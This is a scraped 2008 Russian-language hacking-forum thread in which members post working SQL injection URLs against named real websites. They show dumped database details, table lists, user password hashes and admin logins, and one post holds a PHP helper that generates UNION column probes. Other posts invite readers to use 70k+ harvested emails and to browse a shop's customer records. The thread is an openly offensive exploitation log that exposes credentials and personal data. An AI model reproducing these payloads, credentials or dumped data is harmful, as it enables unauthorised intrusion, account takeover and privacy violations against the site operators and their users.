Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.07.2008, 11:23
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
PareO Шоп
http://www.pareo.ru/info.php?t1=38&t=4'+union+select+1,2,version(),4--'
http://www.pareo.ru/katalog.php?t=1&t1=1&br=31'+union+select+1,version (),3,4,5--'
http://www.pareo.ru/photo.php?f=2834'+union+select+1,2,3,4,5--'
version(): 4.1.22
user(): alex-sport_pareo@localhost
database(): alex-sport_pareo
|
|
|
30.07.2008, 12:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
oculus.ru
PR - 5
Код:
_ttp://oculus.ru/stat.php?tom=-1+union+select+1,unhex(hex(concat_ws(version(),user(),database()))),3,4,5/*
oculus@localhost
4.1.14-log
oculus
sweb - поэтому инъекцию крутить дальше надо через POST
elportal.ru
PR - 3
Код:
http://www.elportal.ru/stat.php?id=-34+union+select+concat_ws(0x3a,version(),user(),database())/*
4.1.22:irweb@localhost:wwwirwebru
и на последок поклонникам DOOM3
pr - 3
Код:
http://www.doom3.ru/stat.php?id_rubr=1+and+substring(version(),1,1)=4/*
вывода нет. версия мускула - 4.0.*
Последний раз редактировалось geezer.code; 30.07.2008 в 13:57..
|
|
|
|
30.07.2008, 14:20
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от otmorozok428
К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:
Доступ к таблицам есть, просто например users в соседней базе лежит:
Код:
http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u14145_2.users/*
Правда их там всего три, и те админы со странными хэшами 
|
|
|
|
30.07.2008, 14:27
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496
Репутация:
78
|
|
Сайт: www.haydamaky.com PR=4
Так и не смог найти таблицу в которой хрянится логин и пас к админке...
http://www.haydamaky.com/ua/main.php?id=9999999+union+select+1,2,version(),4,5 ,6,7,8,9/*
Вот таблицы
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
albom_new
albom_new_comments
buttons
concert_en
guest
info
news
poster
songs
Админка
http://www.haydamaky.com/admin/
|
|
|
|
30.07.2008, 15:45
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
80047
Репутация:
5
|
|
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе? |
|
|
|
30.07.2008, 15:58
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
http://www.devmaster.net/articles.php?catID=6+union+select+1,user()/*
version() - 5.0.45
database() - Dia_Kharrat_dm_main
user() - dia@localhost
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CJ_UsersOnline
dm_article
dm_category
dm_cotd
dm_eng_rating
dm_eng_search_results
dm_engfeatures
dm_engines
dm_engines_changes
dm_englicenses
dm_features
dm_iotd
dm_news
dm_news_old
dm_section
dm_xotd
dm_xotd_category
ibf_admin_logs_old
ibf_admin_sessions_old
ibf_announcements_old
ibf_attachments_old
ibf_attachments_type_old
ibf_badwords_old
ibf_banfilters_old
ibf_bulk_mail_old
ibf_cache_store_old
ibf_calendar_events_old
ibf_conf_settings_old
ibf_conf_settings_titles_old
ibf_contacts_old
ibf_custom_bbcode_old
ibf_email_logs_old
ibf_emoticons_old
ibf_faq_old
ibf_forum_perms_old
ibf_forum_tracker_old
ibf_forums_old
ibf_groups_old
ibf_languages_old
ibf_mail_error_logs_old
ibf_mail_queue_old
ibf_member_extra_old
ibf_members_converge_old
ibf_members_old
ibf_message_text_old
ibf_message_topics_old
ibf_moderator_logs_old
ibf_moderators_old
ibf_pfields_content_old
ibf_pfields_data_old
ibf_polls_old
ibf_posts_old
ibf_reg_antispam_old
ibf_search_results_old
ibf_sessions_old
ibf_skin_macro_old
ibf_skin_sets_old
ibf_skin_templates_cache_old
ibf_skin_templates_old
ibf_spider_logs_old
ibf_stats_old
ibf_subscription_currency_old
ibf_subscription_extra_old
ibf_subscription_logs_old
ibf_subscription_methods_old
ibf_subscription_trans_old
ibf_subscriptions_old
ibf_task_logs_old
ibf_task_manager_old
ibf_titles_old
ibf_topic_mmod_old
ibf_topics_old
ibf_topics_read_old
ibf_tracker_old
ibf_upgrade_history_old
ibf_validating_old
ibf_voters_old
ibf_warn_logs_old
mk_archive
mk_blobs
mk_brokenlinks
mk_categorylinks
mk_cur
mk_hitcounter
mk_image
mk_imagelinks
mk_interwiki
mk_ipblocks
mk_links
mk_linkscc
mk_logging
mk_math
mk_objectcache
mk_old
mk_oldimage
mk_querycache
mk_recentchanges
mk_searchindex
mk_site_stats
mk_user
mk_user_newtalk
mk_user_rights
mk_validate
mk_watchlist
phpads_acls
phpads_acls_channel
phpads_ad_category_assoc
phpads_ad_zone_assoc
phpads_affiliates
phpads_affiliates_extra
phpads_agency
phpads_application_variable
phpads_banners
phpads_campaigns
phpads_campaigns_trackers
phpads_category
phpads_channel
phpads_clients
phpads_data_intermediate_ad
phpads_data_intermediate_ad_connection
phpads_data_intermediate_ad_variable_value
phpads_data_raw_ad_click
phpads_data_raw_ad_impression
phpads_data_raw_ad_request
phpads_data_raw_tracker_click
phpads_data_raw_tracker_impression
phpads_data_raw_tracker_variable_value
phpads_data_summary_ad_hourly
phpads_data_summary_ad_zone_assoc
phpads_data_summary_channel_daily
phpads_data_summary_zone_country_daily
phpads_data_summary_zone_country_forecast
phpads_data_summary_zone_country_monthly
phpads_data_summary_zone_domain_page_daily
phpads_data_summary_zone_domain_page_forecast
phpads_data_summary_zone_domain_page_monthly
phpads_data_summary_zone_impression_history
phpads_data_summary_zone_site_keyword_daily
phpads_data_summary_zone_site_keyword_forecast
phpads_data_summary_zone_site_keyword_monthly
phpads_data_summary_zone_source_daily
phpads_data_summary_zone_source_forecast
phpads_data_summary_zone_source_monthly
phpads_database_action
phpads_images
phpads_lb_local
phpads_log_maintenance_forecasting
phpads_log_maintenance_priority
phpads_log_maintenance_statistics
phpads_password_recovery
phpads_placement_zone_assoc
phpads_plugins_channel_delivery_assoc
phpads_plugins_channel_delivery_domains
phpads_plugins_channel_delivery_rules
================================================== ==================
mk_user :
user_id
user_name
user_real_name
user_password
user_newpassword
user_email
user_options
user_touched
user_token
result:
Reedbeta:fd50302fd2f3ef8f527465251903e4fa
Dia Kharrat:5a69a0668268a34d04333c77d2970949
Anubis:75352e3845c8c6a61e52893ce8b178b0
Baldurk:8d761c44f8e4daef212ab80bb8875a6c
Bladder:86c97024c1cb01ebdd09b4feeffdfa44 |
|
|
|
30.07.2008, 18:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
 openit.com.ua
Кста, там чувак есть с античата - inlanger
пароль подходит тока на мыло 
http://openit.com.ua/reportage.php?id=109+union+select+1,2,3,4,5,6,7,8, 9--&LCovId=&mon=6&year=2008&lang=ua
Database Version: 5.0.22-log
Database name: smat6_openit
User name: smat@localhost
Юзеры
http://openit.com.ua/reportage.php?id=109+union+select+1,2,3,concat_ws( 0x203a20,id,login,password,real_name,firstname,cit y,mail),5,6,7,8,9+from+users--&LCovId=&mon=6&year=2008&lang=ua
Проверил robots.txt
User-Agent: *
Allow: /
Disallow: /admin
блин, на бейсике...
пароль из мускуль: admin : admin_admin
кто найдет пасс к админке, стукните плз.. или пм 
__________________
BlackHat. MoDL
|
|
|
|
30.07.2008, 23:53
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от Buddah
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе? ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской
Код:
<?php
for ($i=100; $i<108; $i++) {
echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";
for ($j=1; $j<=$i; $j++) {
echo $j;
if ($j!=$i) echo ",";
};
echo "/*'>$i</a><br>";
}
?>
Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:
Код:
SELECT * FROM EVENT LEFT JOIN REGION ON
(E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE
ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN
BUNDESLAND ON
(E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE
E_ID=99999999
107!!! полей выборки, из которых нужны макс 20, бедный сервак. 
Ну и как результат
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/*
Даже не закрыт доступ к db mysql...
|
|
|
|
31.07.2008, 00:58
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
mmogame.ru
70к+ валидных мэйликов пользуйтесь =):
http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,LOAD_FILE(0x4579),5,6,7,email +from+mmo_users+limit+0,1000%20--%20&cat=1 Хэши паролей соленые((
http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,username,5,6,7,password+from+ test_promoreklama.users+limit+0,1000%20--%20&cat=1 От базы проморекламы, хэши не соленые, на счету модера 130к+ деревянных, но у него пасс сцуко не шифруется - поэтому скул в паблик, кто откроет может поделится)...
4sexshop.ru
Упал только что, а так вот хэш пароля админа
http://www.4sexshop.ru/shop/goods/%20188999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,c oncat(0x3c2f7469746c653e3c68313e,%20%20pass,0x3c2f 68313e),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9+from+user.htm
Админка: admin : ok (нубярко=)
В админке можете поискать своего озабоченного друга, все данные о клиентах там есть вплоть до прописки
Последний раз редактировалось prescott; 31.07.2008 в 01:07..
|
|
|
|
31.07.2008, 02:30
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Сообщение от prescott
Доступ к таблицам есть, просто например users в соседней базе лежит:
Код:
http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u14145_2.users/*
Правда их там всего три, и те админы со странными хэшами Это не странные хеши) это MD5(Unix) вроде)
вот и сами хэши
lenar@tonez.net.ru : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0
admin@tonez.net.ru : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W.
music@tonez.net.ru : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.
Последний раз редактировалось MirA; 31.07.2008 в 02:42..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
